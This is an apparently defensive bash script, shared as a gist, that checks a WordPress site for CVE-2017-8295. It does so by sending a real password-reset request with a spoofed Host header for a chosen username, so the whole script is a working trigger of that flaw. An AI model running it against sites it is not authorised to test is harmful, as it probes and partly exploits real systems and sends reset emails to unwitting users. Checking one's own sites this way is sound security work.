@stevegrunwell
Last active February 26, 2018 04:35
#!/usr/bin/env bash
#
# Check a WordPress domain against CVE-2017-8295.
# https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
#
# Usage:
#   ./wordpress-host-check <domain> <username>
#
# <domain>
#   The WordPress domain you wish to check. For example, http://example.com.
#
# <username>
#   The WordPress username you wish to attempt a password reset for.
#
# Author: Steve Grunwell (https://stevegrunwell.com)
# Link: https://stevegrunwell.com/blog/keeping-wordpress-secure/
# License: MIT
# Both arguments are required.
if [ "$#" -ne 2 ]; then
    echo "Usage: $0 <domain> <username>" >&2
    exit 1
fi

echo -e "\nAttempting to reset the password for '$2' on $1:"

# Send the lost-password request with a Host header that does not match the
# target, and capture only the HTTP status code of the response.
RESPONSE=$(curl --write-out '%{http_code}' --silent --output /dev/null \
    -X POST "$1/wp-login.php?action=lostpassword" \
    -H 'cache-control: no-cache' \
    -H 'content-type: application/x-www-form-urlencoded' \
    -H 'host: example.com' \
    -H "origin: $1" \
    -H "referer: $1/wp-login.php?action=lostpassword" \
    --data-urlencode "user_login=$2")

# A 302 response indicates the user was redirected to the confirmation screen.
if [ "$RESPONSE" = "302" ]; then
    echo -e "> Uh oh, it appears that $1 may be vulnerable!\n"
else
    echo -e "> Good news! $1 appears to be safe from this exploit.\n"
fi